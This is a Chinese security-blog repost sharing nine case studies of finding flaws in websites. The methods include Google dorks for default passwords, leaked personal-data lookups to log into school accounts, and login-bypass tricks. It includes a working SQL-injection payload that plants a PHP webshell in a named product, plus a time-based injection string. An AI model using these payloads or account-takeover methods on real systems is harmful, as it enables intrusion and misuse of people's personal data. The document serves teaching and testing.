互联网侧漏挖掘思路分享

admin 2025年6月4日20:49:25评论31 views字数 1077阅读3分35秒阅读模式

简要

信息收集的重要性不言而喻,根据互联网侧信息泄露+社会工程学技术可以收集大量信息,通过该信息登录后台获取更多功能点扩大信息收集面继续扩大功能点,从而通过更多的功能点测试更多的漏洞。

案例1

google搜索初始密码

site:xxx.edu.cn  初始密码

获取到默认账号和密码规则
互联网侧漏挖掘思路分享
google搜索学号

site:xxx.edu.cn  学号

互联网侧漏挖掘思路分享
知道初始密码是身份证号,社工库去搜名字检索综合数据

互联网侧漏挖掘思路分享

默认账密登录
互联网侧漏挖掘思路分享
成功登录系统

互联网侧漏挖掘思路分享

案例2

同样操作,搜索学号

互联网侧漏挖掘思路分享
信息收集

互联网侧漏挖掘思路分享
忘记密码处

互联网侧漏挖掘思路分享
重置密码

互联网侧漏挖掘思路分享
成功重置登录

互联网侧漏挖掘思路分享

案例3

google搜索

互联网侧漏挖掘思路分享

获取到默认初始密码

互联网侧漏挖掘思路分享
登录系统

互联网侧漏挖掘思路分享
成功登录系统

互联网侧漏挖掘思路分享
这个信息泄露2000+账号

案例4

天翼系统NDay

互联网侧漏挖掘思路分享
直接搜索Nday,使用如下payload

/AgentBoard.XGI?user=-1'+union+select+1,'<?php+eval($_POST["cmd"]);?>'+into+outfile+"C:\Program+Files+(x86)\RealFriend\Rap+Server\WebRoot\4.php"+--+-&cmd=UserLogin

成功上传文件造成RCE

互联网侧漏挖掘思路分享

案例5

接口泄露敏感信息
这个可以看JS前端泄露,一般VUE框架都是前后端分离,接口很多,拿到所有接口写个字典爆破一下,说不定那个程序员粗心(高情商说法)有一个接口就没有鉴权。
互联网侧漏挖掘思路分享

案例6

前端逻辑缺陷
改返回包状态码直接绕过登录,这种对于前后端分离框架的网站也是很多的
网站输入用户名密码,登录抓包

互联网侧漏挖掘思路分享
获取上图返回包并更改resultCode为0.发包

互联网侧漏挖掘思路分享

成功进入后台

互联网侧漏挖掘思路分享

案例7

某OA的Nday
OA系统的漏洞都比较多,遇到网站使用的OA系统可去网上搜索历史漏洞,这里有一个SQL注入。
某OAsql延时注入
payload

company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(9-(IF(18015%3E3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX

互联网侧漏挖掘思路分享
sqlmap检测

互联网侧漏挖掘思路分享

案例8

某旅行公司的接口未授权
可直接访问注册按钮,注册用户
然后进行登录,成功登录
互联网侧漏挖掘思路分享
还发现管理员用户为弱口令admin:123456

互联网侧漏挖掘思路分享

案例9

网站挂黑链
这种对于ZF性质的网站是很严重的,主要是页面自带连接,可使用一些检测工具进行分析
如下图,某ZF网站登录口,鼠标悬停发现链接为sclbs.net网站

互联网侧漏挖掘思路分享
点击直接跳转至BC网站

互联网侧漏挖掘思路分享

原文始发于微信公众号(蓝云Sec):互联网侧漏--挖掘思路分享

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月4日20:49:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   互联网侧漏挖掘思路分享http://cn-sec.com/archives/4131164.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息